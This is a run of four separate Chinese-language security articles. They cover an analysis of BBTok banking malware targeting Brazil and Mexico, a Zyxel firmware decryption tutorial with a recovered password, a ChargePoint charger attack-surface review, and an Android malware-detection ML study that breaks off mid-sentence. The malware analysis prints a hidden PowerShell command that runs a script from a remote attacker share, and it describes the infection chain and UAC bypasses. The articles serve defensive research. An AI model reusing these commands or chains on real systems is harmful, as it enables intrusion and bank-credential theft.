受害者向/baxar、/descargar或/descarga執行HTTP請求（這些路徑表明誘餌是西班牙語或葡萄牙語）； 基於.htaccess文件，服務器使用descarga.php處理請求； 腳本利用文件db.php通過SQLite數據庫存儲有關請求的信息，包括受害者的信息； Desarga.php調用ps_gen.ps1來生成一個自定義文檔，該文檔最終會傳遞給受害者。 傳入請求處理 PHP代碼庫由以下文件組成： 1.descarga/descargar.php：管理新的連接並向受害者的電腦提供引誘文檔。 2.db.php：生成並管理包含受害者詳細信息的SQLite數據庫。 3.generator.php：用於生成隨機鏈接、字符串和其他功能的實用程序類。 4.“Descarga”和“descargar”在西班牙語中翻譯為“download”。此文件包含感染過程的主要邏輯。腳本本身包含許多評論，其中一些是純西班牙語和葡萄牙語，這些評論暗示了攻擊者的來源。 腳本邏輯： 1.它根據ip-api.com檢查鏈接引用的受害者的地理位置，並將其存儲在文件中。如果受害者不是來自目標國家(例如，墨西哥或巴西)，則HTTP連接立即以404消息結束。 2.如果受害者通過了檢查，則腳本解析用戶代理以獲取受害者的Windows操作系統版本。 3.然後，它將帶有受害者的國家/地區代碼和引誘文件名的用戶代理傳遞到PowerShell有效負載生成器腳本。 PowerShell負載生成器腳本ps_gen.ps1包含用於生成ZIP或ISO文件形式的文檔有效負載的主要邏輯。最新版本的代碼有很多失效的部分，這部分在過去可能是有效的，這表明它們包含額外的感染鍊和誘餌，我們發現了該文件的多個版本，其中一些可以追溯到2022年7月，這表明該活動已經進行了很長一段時間。 生成器腳本由descarga.php調用，使用帶有參數file_name、ver和cc的函數DownloadFile，這些對應於生成的文檔名稱、受害者的操作系統版本和受害者的國家代碼。 在觀察到的服務器迭代中使用的代碼部分基於兩個參數生成文檔有效負載： 受害者的國度：巴西或墨西哥； 從User-Agent中提取的操作系統：Windows 10或7； 根據結果，選擇惡意文檔的以下參數： 文件類型：Windows 10為ISO, Windows 7為ZIP； 下一階段使用的DLL文件的名稱根據目標國家的不同而變化：Trammy用於巴西，Gammy用於墨西哥。 該文檔包含一個鏈接：Windows 10中的LNK快捷圖標是Microsoft Edge使用的快捷圖標，Windows 7中的LNK快捷圖標是Google Chrome使用的快捷圖標。 最後的執行邏輯：對於Windows 10受害者，該腳本使用來自服務器216[.]250[.]251[.]196的名為dat.xml的文件執行MSBuild.exe，該文件還存儲下一階段的惡意DLL。對於Windows7，負載只是通過CMD執行下載相關的遠程DLL。 添加位置混淆 所有有效載荷都使用Add-PoshObfusion函數進行模糊處理。對部分代碼的簡單搜索會從“良性”網站hackforums[.]net中得到一個結果，特別是2021年8月一位名為“Qismon”的用戶的回复，其還推薦了一些繞過AMSI和安全產品的方法，並分享PoshObfusion代碼： 在hackforums[.]net中共享的Add-PoshObfuscation()代碼 攻擊鍊和最終有效負載上面描述的過程最終導致了兩個攻擊鏈的變體：一個針對Windows 7，一個針對Windows 10。兩個版本之間的差異可以解釋為試圖避免新實現的檢測機制，如AMSI。 *ammy.dll下載程序兩個感染鏈都使用使用類似約定命名的惡意DLL——Trammy、Gammy、Brammy或Kammy。後者是BBTok加載程序的精簡和混淆版本，在執行任何惡意操作之前使用地理圍欄來阻止檢測。最後的有效負載是一個新版本的BBTok銀行程序。如上所述，BBTok附帶了多個額外的密碼保護軟件。這些漏洞允許攻擊者完全訪問受攻擊的設備和其他功能。 Windows 7攻擊鏈 Windows 7攻擊鏈 Windows 7的攻擊鏈不是唯一的，它由存儲在ZIP文件中的LNK文件組成。在執行LNK文件時，使用rundll32.exe運行* my.dll負載，rundll32.exe依次下載、提取和運行BBTok負載。 Windows 10攻擊鏈 Windows 10攻擊鏈 Windows 10的攻擊鏈存儲在一個包含3個組件的ISO文件中：一個LNK文件，一個lure文件和一個重命名的cmd.exe可執行文件。點擊LNK文件啟動攻擊鏈，使用重命名的cmd.exe以以下方式運行所有命令： 攻擊鏈將lure文件複製到文件夾%userprofile%並打開它。 在BBTok攻擊中釋放的Lure文件 運行MSBuild.exe，使用存儲在遠程服務器上的XML(通過SMB獲取)構建應用程序。 MSBuild.exe創建一個隨機命名的DLL，它反過來從服務器下載* my. DLL，並以重命名的rundll32.exe(mmd.exe)運行它，如XML內容所示： dll下載程序下載、提取並運行BBTok負載 重命名CMD、MSBuild和通過SMB獲取文件的獨特組合導致Windows 10攻擊鏈很少被檢測到。 早期版本在對BBTok活動的分析中，研究人員遇到了來自有效負載服務器的多個版本的工件。我們看到PHP代碼、PowerShell腳本和其他實用程序都發生了變化。 PHP代碼的變化查看descarga.php腳本的早期版本，我們看到了一些關鍵的差異： 最初，只有來自墨西哥的受害者會成為攻擊目標。另一個有效負載服務器176[.]31[.]159[.]196的IP在腳本中進行了硬編碼。 這裡沒有直接執行PowerShell腳本，而是調用了一個名為gen.php的腳本。雖然研究人員無法獲得這個腳本，但相信它只是執行了PowerShell腳本。 使用db.php文件將受害者的IP地址、用戶代理和標誌(jaBaixou，即葡萄牙語中的“已下載”)插入數據庫中。稍後檢查該標誌，以確保不會提供相同的有效負載。 由於最新版本中未使用此部分，攻擊者可能發現此過程繁瑣，並決定用OPSEC來換取更容易的管理和更高的攻擊成功機率。 PowerShell腳本修改說明查看PowerShell腳本的舊版本，可以清楚地看到對負載和執行鏈進行了大量更改。在最早版本的腳本中，LNK只是運行一個PowerShell腳本，其參數為-ExecutionPolicy Unrestricted-W hidden-File\\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1。 後來的更新添加了lure PDF，fac.PDF（“fac”是“factura”的縮寫，在葡萄牙語中是“發票”）。這是來自墨西哥科利馬縣的合法西班牙語收據。此外，Windows7受害者的有效負載啟動了一個合法的墨西哥政府網站hxxps://failover[.]www[.]gob[.]mx/matenimiento.html。 研究人員發現的最新版本打開了一個不同的合法網站hxxps://fazenda[.]gov[.]br，巴西政府網站。此版本還更改了MSBuild使用的XML文件，並將為巴西目標保留的DLL名稱從Brammy.DLL更改為Trammy.DLL。 未使用的代碼和感染媒介PowerShell腳本中的某些代碼部分未使用，服務器託管的文件不屬於我們討論的主要感染流。特別是，研究人員沒有發現任何積極使用以下內容的跡象： ze.docx是一份利用Follina CVE（2022-30190）的文檔。 PowerShell腳本中名為CreateDoc的函數中引用了它。 CreateXLL引用的xll.xll是從開源項目中獲取的惡意xllhttps://github.com/moohax/xllpoc，通過Excel實現代碼執行。在服務器上發現了許多空的JavaScript文件，這些文件很可能被名為CreateJS的函數使用。函數b.js中引用的文件是空的，因此不清楚該函數以前是使用過還是從未完全實現過。 服務器上有多個bat文件，每個文件都有不同的下載下一階段的實現。這些很可能是由名為CreateBat的函數創建的，該函數在最新版本的PowerShell腳本中被取消掉了。它們中的大多數幾乎與我們之前分析的ByFD函數中的代碼相同，不包括過去兩次值得注意的迭代： 最舊的bat文件下載了另一個PowerShell腳本作為下一階段（該腳本不再公開），而不是編輯註冊表； 稍後的bat文件使用了fodhelper UAC繞過，而不是當前正在使用的computerdefaults繞過。 受害者分析研究人員對服務器端組件的分析也揭示了最近的一個活動，從攻擊者的角度來看，這是基於他們發現的一個數據庫，該數據庫記錄了對惡意應用程序的訪問。該數據庫名為links.sqlite，非常簡單。它包含150多個條目，所有條目都是唯一的，表頭與db.php創建的條目相對應。 chave或key； assunto或subject； user_agent ； baixou或downloaded。 名為chave的列包含受害者的IP地址，而assunto列為空： Links.sqlite數據庫 攻擊區域 由於除了攻擊者之外，任何人都不會看到服務器代碼，並且其中包含大量葡萄牙語評論，我們認為這表明攻擊者很可能是巴西人，巴西人以其活躍的銀行惡意軟件生態系統而聞名。 總結儘管BBTok目前僅在巴西墨西哥活動，但很明顯，它仍在積極開發中。由於其眾多功能，以及涉及LNK文件、SMB和MSBuild的獨特而創造性的傳播方法，它仍然對該地區的組織和個人構成威脅。

0x00 前言本文將要介紹Zyxel固件解密的兩種通用方法，記錄測試心得。 0x01 簡介本文將要介紹以下內容： 基礎知識 通過已知明文攻擊解密zip文件 通過跟踪進程參數獲得zip加密口令 0x02 基礎知識1.固件下載固件下載地址：https://portal.myzyxel.com/my/firmwares 需要註冊賬戶，可下載指定版本的固件 2.常見固件類型ATP USG FLEX VPN ZyWALL/USG 這里以VPN50 5.36(ABHL.0)為例，下載後保存為VPN50_V5.36(ABHL.0).zip 接下來介紹固件解密的兩種方法 0x03 通過已知明文攻擊解密zip文件參考資料：https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis VPN50_V5.36(ABHL.0).zip中的文件內容如下： 536ABHL0C0.bin 536ABHL0C0.conf 536ABHL0C0.db 536ABHL0C0.pdf 536ABHL0C0.ri VPN50_V5.36(ABHL.0)C0-foss.pdf 其中，536ABHL0C0.bin和536ABHL0C0.db被加密，需要解密 解密條件： 1、已知完整的明文文件和zip文件 2、明文文件需要被相同的壓縮算法壓縮 3、加密算法為ZipCrypto Store 對於VPN50_V5.36(ABHL.0).zip，536ABHL0C0.conf同536ABHL0C0.bin中的db/etc/zyxel/ftp/conf/system-default.conf文件一致，同536ABHL0C0.db中的etc/zyxel/ftp/conf/system-default.conf文件一致，滿足條件1 對於條件2，需要確定536ABHL0C0.bin和536ABHL0C0.db的壓縮算法，參考資料也未涉及這部分內容，這裡詳細介紹分析流程 查看536ABHL0C0.bin中db/etc/zyxel/ftp/conf/system-default.conf的壓縮信息：zipdetails -v 536ABHL0C0.bin 返回結果： 得出壓縮算法如下： 所以在壓縮536ABHL0C0.conf時需要加入參數-9設定為compress better，即Maximum Compression 完整解密命令如下： (1)安裝pkcrack (2)解密536ABHL0C0.bin (3)解密536ABHL0C0.db 需要注意536ABHL0C0.bin和536ABHL0C0.db的system-default.conf絕對路徑不同 0x04 通過跟踪進程參數獲得zip加密口令參考資料：https://security.humanativaspa.it/zyxel-firmware-extraction-and-password-analysis/ 解密原理：從.ri文件能夠提取出zld_fsextract，zld_fsextract能夠根據文件內容計算出解壓口令進而解密.bin文件 經測試，使用zld_fsextract也可以解開其他固件的.bin文件 1.提取zld_fsextract 查看文件類型：file zld_fsextract 返回結果：zld_fsextract: ELF 32-bit MSB executable, MIPS, N32 MIPS64 rel2 version 1 (SYSV), statically linked, stripped 提示zld_fsextract為MIPS結構，需要搭建MIPS環境運行 2.搭建MIPS環境 3.監控進程啟動 注： 需要加入參數-f跟踪由fork調用所產生的子進程，加入參數-s 199指定trace結果的每一行輸出字符串的長度，如果未設置參數-s，無法記錄完整的解密口令 返回結果實例： 從中獲得解密口令GfmirkjRUJla2evWFLtqJoI5a6vfOmDgR/OIl7lFSWrXBm3S7yJTmdaMlV19HGr 注： 該解密口令不適用於536ABHL0C0.db 0x05 小結本文介紹了Zyxel固件解密的兩種通用方法，分享了在解密過程中需要記錄的細節。

ChargePoint Home Flex是一款二級電動汽車充電站，專為終端用戶在家中使用而設計。該設備在其硬件中有一個最小的用戶界面，該設備採用移動應用程序進行安裝，並滿足消費者對設備的常規操作。 通常來講，該設備的攻擊面可以分為三類。 1.ChargePoint移動應用程序安裝人員在安裝ChargePoint Home Flex裝置時使用的ServicePro應用程序提供了一種攻擊途徑。 終端用戶在配置和使用ChargePoint Home Flex時使用的ChargePoint應用程序也提供了一個攻擊面。 2.ChargePoint Home Flex硬件該設備包括一個嵌入式Linux主機，通過Wi-Fi與互聯網上的主機進行通信，該單元還包含一個基於德州儀器MSP430微控制器的PCB。無線通信PCB基於Atmel CPU。最後，JTAG接口可以通過無線通信PCB訪問。 3.網絡攻擊面設備的軟件補丁是通過基於互聯網的空中傳送（OTA）更新提供的。移動應用程序用於本地通信的藍牙低能耗（BLE）終端可能會提供攻擊機會，與本地接入點的任何Wi-Fi通信都為攔截和操縱打開了機會。最後，該設備實現了開放式充電樁協議（OCPP）。該協議中的任何漏洞都將在充電器中暴露出來。 安全性研究卡巴斯基實驗室的研究員Dmitry Skylar對ChargePoint Home Flex進行了安全評估。 ChargePoint Home Flex移動應用程序ChargePoint提供兩種應用程序，可與Home Flex充電器一起使用，這兩個應用程序都通過藍牙低能耗（BLE）與ChargePoint Home Flex進行交互。 ChargePoint ServicePro應用程序會在終端用戶安裝設備時使用。此應用程序是使用React Native應用程序開發框架編寫的。這是一個基於JavaScript的開發框架，用於跨平台移動應用程序開發。 以消費者為中心的ChargePoint移動應用程序旨在供最終用戶使用，以管理他們的充電偏好。 雖然我們沒有徹底調查這些應用程序的漏洞或其他漏洞，但移動應用程序中的漏洞是一個重要的攻擊表面。 ChargePoint Home Flex藍牙低能耗ChargePoint Home Flex使用藍牙低能耗與移動應用程序進行通信。趨勢科技的研究人員使用自定義BLE掃描工具找到了充電器提供的終端。 BLE規範中定義了以下服務： 1.BLE服務設備信息： 1.1系統ID； 1.2 型號字符串：CPH50； 1.3序列號字符串； 1.4 程序修訂字符串：5.5.2.5； 研究人員在掃描被測設備（DUT）時觀察到以下BLE服務和功能： 2.設備詳細信息服務：274BC3A3-1A52-4D30-99C0-4DE08FFF2358： Get/Set PowerSourceType：8D4D6AF5-E562-DC7-85AD-842FBF321C87特點； Get/Set PowerSourceAmps：F24F7C35-A5FD-4B98-BCA5-50BB5DC8E7CD特點； Get/Set Apply Settings Status：5597DD46-7EDD-40CC-9904-B693DC05E19特點； Get/Set UserId：E79C86D4-8106-4908-B602-5B61266B2116特點； Get/Set Latitude：85F296FC-3152-4EF0-84CB-FAB8D05432E4特點； Get/Set Longitude：9253A155-701A-4582-A0CF-5E517E553586特點； Get/Set NOSStatus：C31D51E5-BD61-4D09-95E2-C0E34ED1224C特點； Get/Set Power Source：C1972E92-0D07-4464-B312-E60BA5F284FC特點； 3.無線上網服務DFAF46E7-04F9-471C-8438-A72612619BE9 Get/Set NextWIFIAccessPoint：E5DEB4B-4DAC-4609-A533-B628E5797E91特點； Get/Set CurrentSSID：EB61F605-DED9-4975-9235-0A5F4941F32特點； Get/Set WIFISecurityType：733ED10A-CD1B-43CA-A0C2-6864C8DCF7C1特點； Get/Set WiFi Configuration：25A03F00-1AF2-44F0-80F2-D6F771458BB9特點； Get/Set ApplyStatusCode：3BE83845-93E461E-8A49-737F790EBC4特點； Get/Set Always Empty Response Characteristic：CED647D7-E261-41E2-8F0D-35C360AAE269特點； 3.未知服務B67CB923-50E4-41E8-BECC-9ACD24776887：Get/Set Always NULL Byte Characteristic，7AC61302-58AB-47BA-B8AA-0094DB0B9A1特點； 趨勢科技的研究人員使用自定義的BLE掃描儀對這些BLE終端進行了有限的探測。此外，趨勢科技的研究人員對最終用戶ChargePoint應用程序進行了逆向工程。上表中確定的名稱是根據對Android應用程序代碼的理解推斷出來的。 ChargePoint Home Flex硬件詳細信息ChargePoint Home Flex包括位於設備shell內的兩塊電路板，分別是計量板和CPU板。 計量板包含一個MSP430微控制器。它終止了與電源的電源連接，還終止了最終用戶連接到電動汽車的充電電纜。計量板還通過堆疊在計量板右上方的PCB連接器為CPU板供電。計量板在PCB絲網標記上標記有Panda AC 50標識符，它擁有一個MSP430微控制器。 CPU板承載ATMEL Arm CPU、Wi-Fi無線電和藍牙LE無線電，CPU板在PCB絲網標記上標記為CPH-50 CPU。 以下是一些詳細介紹ChargePoint家用Flex計量板和CPU板的圖片: CPH-50 CPU板正面 CPH-50 CPU板背面 ChargePoint Home Flex計量板正面 ChargePoint Home Flex計量板背面 ChargePoint Home Flex嵌入式Linux卡巴斯基實驗室先前的研究表明，該充電器使用Linux操作系統。充電器硬件有一個確定為“Panda CPU”板，它實現了充電器上所有可訪問的攻擊面。硬件包括一個ARM CPU，該設備提供一個JTAG調試接頭。先前的研究表明，這種JTAG接頭可以用來獲得shell對充電器的訪問權限。 在對充電器的初步評估中，趨勢科技的研究人員使用了一個捕獲測試網絡來詢問ChargePoint Home Flex。測試網絡有一個運行的Wi-Fi接入點，該接入點連接到運行一組服務的網絡，該服務被配置為模擬充電器所需的服務。該網絡具有一個DNS服務器，該網絡有一個DNS服務器，它被配置為使用測試網絡中的IP地址響應所有DNS A-record查詢。 在測試過程中，研究人員觀察了DUT進行的DNS查詢，並用其試圖連接的所有觀察到的主機名配置了DNS服務器。此外，測試網絡還包括一個web服務器，該服務器被配置為響應DUT提出的網絡請求。 DUT已向以下域發出DNS請求：ba79k2rx5jru.chargepoint.com； homecharger.chargepoint.com； publish.chargepoint.com； 研究人員指出，由於TLS證書頒發機構不匹配，向web服務器發起的TLS連接無法建立。強制執行TLS證書頒發機構匹配是一種安全優勢。 ChargePoint Home Flex通過SSH連接到TCP端口343上的服務器ba79k2rx5jru.ChargePoint.com。該研究網絡包括一個允許對任何用戶進行身份驗證的SSH服務器。當充電器啟動與測試網絡中允許的SSH服務器的連接時，研究人員注意到DUT的SSH客戶端啟動了從SSH服務器轉發到充電器上的TCP端口23的TCP端口。這與卡巴斯基研究報告中提到的結果相吻合。 ba79k2rx5jru.chargepoint.com homecharger.chargepoint.com publish.chargepoint.com 研究人員指出，由於TLS證書頒發機構不匹配，向web服務器發起的TLS連接無法建立。強制執行TLS證書頒發機構匹配是一種安全優勢。 ChargePoint Home Flex在TCP端口343上通過SSH連接到服務器ba79k2rx5jru.chargepoint.com。研究網絡包括一個允許對任何用戶進行身份驗證的授權SSH服務器。當充電器啟動連接到測試網絡中的許可SSH服務器時，研究人員注意到來自DUT的SSH客戶端啟動了一個TCP端口，從SSH服務器返回到充電器上的TCP端口23，這與卡巴斯基研究報告中提到的結果相符。 總結雖然這些可能不是ChargePoint Home Flex設備上唯一可用的攻擊面，但它們代表了攻擊者可能用來利用該設備的最可能途徑。

問題描述 Android 市場的開放性導致了惡意軟件（Malware）的盛行。據360 安全中心報告，每天都能截獲數万個Android 惡意軟件，使得Android Malware Detection 成為研究人員熱議的話題。傳統的Android 惡意軟件檢測方法主要依賴於基於規則或簽名的檢測機制，其中使用yara 實現相對簡單。但這種基於簽名的檢測方法是信息密集型的，需要持續收集新的簽名，而基於規則的實現則極為複雜，極易導致誤報或讓狡猾的惡意軟件逃過檢測。 隨著機器學習的流行，越來越多的研究人員開始嘗試利用機器學習來實現惡意軟件的檢測。核心思路是從Android 的APK 文件中提取信息，用於訓練模型，隨後預測其他APK 文件是否為惡意軟件。根據信息提取方法的不同，主要分為兩類：一類是通過靜態分析，從APK 中提取permissions、intents、receivers 等組件，以及通過反編譯提取代碼調用，利用這些信息進行模型訓練；另一類是通過實際安裝運行APK，攔截網絡請求和監聽系統API 調用來獲取數據，作為模型訓練的基礎。 在探討此問題時，由於“Incinerator”項目的動態檢測功能尚未完全實現，我們暫時缺乏研究動態分析的條件，因此選擇採用靜態分析方法進行研究。 當前主流方案 基於靜態分析的機器學習訓練方案主要包括以下幾類： 權限提取訓練： 從AndroidManifest.xml中提取permissions信息進行模型訓練。 綜合信息提取訓練： 從AndroidManifest.xml中提取permissions、intents、receivers等信息，並通過反編譯從APK 中基於規則抽取Android 系統API 調用等信息進行模型訓練。 整體APK 訓練： 將整個APK 文件作為機器學習訓練的輸入，包括將APK 文件的二進製字節流作為輸入，或通過反編譯抽取opcode作為訓練輸入。 據文獻報導，這些方案可實現90% 以上的準確率。尤其是方案3，準確率在92%-93% 之間，而方案1 和2 在多數研究中可達到95% 以上的準確率。 我們試圖重現文獻中的方案，首先著手基於permissions的方案進行驗證。 數據源： 惡意軟件集合： a. 來自威脅情報公司abuse.ch 的Malware APK 集合2000 個（簡稱MB） b. VirusShare 2020/2021/2022 的Malware 集合（簡稱VS2020/VS2021/VS2022） 良性軟件集合： a. 從應用寶下載的APK 10000 個 b. 從APKPURE 下載的APK 10000 個 訓練方法 通過靜態分析從APK 的AndroidManifest.xml中抽取AOSP （Android Open Source Project） permissions，並通過One-hot Encoding 的方式輸入模型進行訓練。模型選擇採用傳統的機器學習二分類模型如隨機森林、SVM 等進行訓練。經測試，隨機森林的效果最佳，準確率可達98%。 我們選擇應用寶的APK 作為良性樣本，VS2022 作為惡意軟件樣本，進行訓練。訓練數據如下： 模型PrecisionRecallFPR隨機森林0.9830.9830.056SVM0.9810.9770.063 然後我們對其他數據集進行測試驗證： 數據集PrecisionRecallFPRAPKPure0.0NAN0.59MB1.00.95NANVS20201.00.96NANVS20211.00.94NAN 在進行APKPure 數據集的驗證時，發現模型的假陽性率異常高，超過了50%，這表明模型在不同數據集的交叉驗證上表現不佳。同時，在MB、VS2020、VS2021 數據集上得到的高準確率由於高假陽性率而變得無意義。 為了深入理解模型的預測表現，我們選擇使用LinearSVM（線性支持向量機）來解釋模型的預測結果，並嘗試探討可能出現的問題： 在訓練過程中，共有265 個權限被用於訓練模型。我們重點分析了對於Malware 預測結果影響最大的30 個權限： 01.9507425950717683android.permission.READ_SMS 11.6805547441380115android.permission.SEND_SMS 21.5291784053142392android.permission.RECEIVE_SMS 31.281383891333467android.permission.WRITE_SMS 41.1385944832617678android.permission.GET_DETAILED_TASKS 51.0870145778775504android.permission.MANAGE_USERS 60.9822953162458009android.permission.SET_TIME_ZONE 70.9815855293627985android.permission.REQUEST_DELETE_PACKAGES 80.8705538278525148android.permission.ACCOUNT_MANAGER 90.7701851337780519android.permission.ACCESS_CACHE_FILESYSTEM 100.7493889020376178android.permission.PERSISTENT_ACTIVITY 110.742267985802697android.permission.SET_PREFERRED_APPLICATIONS 120.6575763216374741android.permission.USE_SIP 130.6423455602781643android.permission.MODIFY_PHONE_STATE 140.5733719308777389android.permission.READ_CALL_LOG 150.5713221448442122android.permission.WRITE_SECURE_SETTINGS 160.5177117115666185android.permission.CLEAR_APP_CACHE 170.5013751180995185android.permission.WRITE_SYNC_SETTINGS 180.47540432455574055android.permission.INJECT_EVENTS 190.450576746748121android.permission.BIND_ACCESSIBILITY_SERVICE 200.4497437629117625android.permission.READ_SYNC_STATS 210.40721040702182304com.android.alarm.permission.SET_ALARM 220.3958974436391258android.permission.GET_PACKAGE_SIZE 230.35828369132005317android.permission.TRANSMIT_IR 240.3538089622374305android.permission.CHANGE_COMPONENT_ENABLED_STATE 250.3303834311984685android.permission.STATUS_BAR 260.3277728921018696android.permission.WRITE_USER_DICTIONARY 270.31322691738916597android.permission.SET_DEBUG_APP 280.28600828593282673android.permission.INSTALL_PACKAGES 290.27804088205285526android.permission.SHUTDOWN 導致Benign 結果最重要的30 個權限： 1-1.0280830288092226android.permission.FORCE_STOP_PACKAGES 2-1.0244749163270055android.permission.DELETE_CACHE_FILES 3-0.9235183435775582android.permission.READ_PRIVILEGED_PHONE_STATE 4-0.7975588094210508android.permission.USE_BIOMETRIC 5-0.7691538868495551android.permission.READ_CELL_BROADCASTS 6-0.7288571523071693android.permission.REQUEST_INSTALL_PACKAGES 7-0.7278186994140812android.permission.WRITE_CALL_LOG 8-0.7029898754031535android.permission.READ_SEARCH_INDEXABLES 9-0.6832562629713737android.permission.ACCESS_NOTIFICATION_POLICY 10-0.6442707037030093android.permission.BIND_NOTIFICATION_LISTENER_SERVICE 11-0.6229441323892875android.permission.CAPTURE_AUDIO_OUTPUT 12-0.5951302503005503android.permission.REORDER_TASKS 13-0.552113274404841android.permission.FACTORY_TEST 14-0.5512329811397917android.permission.CAMERA 15-0.5415431826751977android.permission.PACKAGE_USAGE_STATS 16-0.5373788445105623android.permission.READ_SYNC_SETTINGS 17-0.5300427083556158android.permission.ACCESS_WIFI_STATE 18-0.48952375397337794android.permission.READ_PHONE_NUMBERS 19-0.4822239255635727android.permission.STOP_APP_SWITCHES 20-0.4525220364959383android.permission.WRITE_MEDIA_STORAGE 21-0.4133049145725493com.android.browser.permission.WRITE_HISTORY_BOOKMARKS 22-0.3902532535519829android.permission.CAPTURE_VIDEO_OUTPUT 23-0.34681147328619505android.permission.READ_FRAME_BUFFER 24-0.34134222449779317android.permission.WRITE_GSERVICES 25-0.3335042039412585android.permission.BIND_APPWIDGET 26-0.3263774109427998android.permission.AUTHENTICATE_ACCOUNTS 27-0.3136298914538836android.permission.NFC 28-0.3000955825422318android.permission.READ_EXTERNAL_STORAGE 29-0.2846046321402758android.permission.CALL_PRIVILEGED 30-0.28338090002182315android.permission.READ_CALENDAR 在表格中，第二列顯示了通過SVM 計算得到的權重值。由於在標籤設定中，Malware 被標記為1，而Benign 被標記為0，且訓練數據的格式是0，1，1，0，0,1,1,0,這樣的布爾值，因此，當權重為正時，該權重在計算Malware 的預測結果時具有較高的重要性；權重值越大，其重要性越高。相反，當權重為負時，該權重在計算Benign 的預測結果時具有較高的重要性；權重值越小，其重要性越高。 通過分析這些權限及其功能，我們發現Malware 相關的權限通常比Benign 相關的權限具有更高的危害性。在一定程度上，這種模型的設計是合理的。例如，模型成功識別了與SMS 相關的權限主要與Malware 相關，並賦予了較高的權重，這意味著，基本上，一個APP 如果包含SMS 權限，就非常可疑。實際上，普通的APP 不應該請求此類權限，因為短信管理通常是系統APP 的職責。 然而，這裡存在一個問題：權限的存在是因為Android 系統認為某些行為可能不妥，需要用戶確認。所以，理論上，所有需要請求的權限都有可能對用戶造成損害。因此，沒有請求權限應該被視為一個加分項。但在二分類機器學習的情境下，模型會做出區分，因為Benign 類別的存在意味著一定會有一部分權限被視為支持Benign 的證據。 現在我們來分析為什麼會出現如此高的假陽性率： 我們使用LinearSVC 來解釋模型的預測結果，並對一些具有假陽性的權限信息進行分析： 0.1773649887447295android.permission.WAKE_LOCK 0.01285824377030036android.permission.INTERNET -0.1357928094523775android.permission.ACCESS_NETWORK_STATE 0.43102404170044467com.android.alarm.permission.SET_ALARM 0.1773649887447295android.permission.WAKE_LOCK 0.14741402851800423android.permission.SYSTEM_ALERT_WINDOW 0.02740438240042149android.permission.FOREGROUND_SERVICE 0.01285824377030036android.permission.INTERNET -0.1357928094523775android.permission.ACCESS_NETWORK_STATE -0.15043626374678254android.permission.WRITE_EXTERNAL_STORAGE -0.1975995718519041android.permission.CHANGE_WIFI_STATE -0.20461138790573433android.permission.VIBRATE -0.511067438637911android.permission.ACCESS_WIFI_STATE 0.1773649887447295android.permission.WAKE_LOCK 0.02740438240042149android.permission.FOREGROUND_SERVICE 0.01285824377030036android.permission.INTERNET -0.1357928094523775android.permission.ACCESS_NETWORK_STATE -0.33867385510052594android.permission.READ_EXTERNAL_STORAGE -0.511067438637911android.permission.ACCESS_WIFI_STATE 而真陽的權限信息： 0.32757400447767016android.permission.INSTALL_PACKAGES 0.2870058866311678android.permission.READ_PHONE_STATE 0.1773649887447295android.permission.WAKE_LOCK 0.1545767541451571android.permission.FLASHLIGHT 0.14613075920332474android.permission.BLUETOOTH_ADMIN 0.140268653568319android.permission.GET_ACCOUNTS 0.08641386050999389android.permission.MOUNT_UNMOUNT_FILESYSTEMS 0.06460516872049353android.permission.ACCESS_COARSE_LOCATION 0.01285824377030036android.permission.INTERNET -0.009804892771664459android.permission.ACCESS_FINE_LOCATION -0.12321341834571817android.permission.READ_LOGS -0.1357928094523775android.permission.ACCESS_NETWORK_STATE -0.15043626374678254android.permission.WRITE_EXTERNAL_STORAGE -0.15994619600450963android.permission.CHANGE_NETWORK_STATE -0.16005902734200772android.permission.WRITE_SETTINGS -0.1975995718519041android.permission.CHANGE_WIFI_STATE -0.20461138790573433android.permission.VIBRATE -0.23536025455979454android.permission.CALL_PHONE -0.24802834827531783android.permission.ACCESS_LOCATION_EXTRA_COMMANDS -0.30018060973660377android.permission.BLUETOOTH -0.33867385510052594android.permission.READ_EXTERNAL_STORAGE -0.511067438637911android.permission.ACCESS_WIFI_STATE -0.5625902678304402android.permission.CAMERA -0.7242676191415552android.permission.REQUEST_INSTALL_PACKAGES 通過分析，我們發現了一個模式：擁有較少權限的APK 往往會被誤判，而權限較多的APK 基本能得到正確的預測。深入探究後，我們理解到這種現象的出現主要是由於APKPure 樣本中大多數APK 的權限數量較少，而我們的訓練模型主要基於權限較多的應用寶APK 樣本。因此，預測誤差的產生在一定程度上是由樣本差異導致的。 為了解決這個問題，一個直接的方法是將APKPure 的數據也納入訓練過程，以增強模型的泛化能力和預測準確性。 我們採取了以下措施：從APKPure 樣本中隨機抽取一半，即5000 個APK，同時從應用寶樣本中隨機抽取一半，約5000 個APK，一同用於模型的訓練。然後，我們使用這個新訓練得到的模型來預測未參與訓練的樣本。結果顯示，新模型的預測準確率得到了顯著提高。 模型PrecisionRecallFPR隨機森林0.9940.9670.008SVM0.9940.9670.008 然後我們對其他數據集進行測試驗證： 數據集PrecisionRecallFPRAPKPure 未參與訓練的樣本0.0NAN0.018MB1.00.878NANVS20201.00.92NANVS20211.00.89NAN 假陽性率已降至可接受的水平。這個實驗揭示了一個重要的現象：在訓練集上獲得理想的結果相對容易，但在現實世界中準確預測卻可能面臨挑戰。無人能保證所收集的樣本完美地反映了現實世界的情況，而我們的目標是識別那些真正與惡意軟件（Malware）相關的特徵。因此，我們決定嘗試探索其他可能的解決方案。 1. 基於 Intents 和 Receivers 的訓練 隨後，我們擴展了特徵集，加入了從AndroidManifest.xml中提取的intents和receivers信息進行訓練，然而，這並沒有提高模型的準確率。 2. 基於系統 API 調用的訓練 我們進一步嘗試提取APK 中的所有系統API 調用，將其轉換為適合卷積神經網絡（CNN）的格式，並通過CNN 來訓練模型。在訓練集上，模型達到了令人滿意的97% 的準確率，但在數據集交叉驗證時，表現仍然不盡如人意。 在這過程中，我們遇到了幾個問題： API 調用頻率的不明顯差異： 最初，我們通過反編譯提取了所有出現過的API 調用，卻發現這些API 的調用頻率並沒有明顯差異。例如，我們原本認為accessibilityservice 的調用明顯與惡意軟件相關，卻發現在良性軟件中也頻繁出現。後來我們了解到，這主要是因為大多數APK 都依賴於android 這個庫，而該庫中包含了大量的系統API 調用。由於Malware 和Benign APK 都依賴於大量的第三方庫，這些庫中存在大量的系統API 調用，使得我們難以從系統API 調用的統計結果中區分Malware 和Benign。即便我們使用了incinerator 的SCA 分析功能來檢測和剔除這些第三方庫，結果仍然不盡如人意。 第三方庫的干擾： 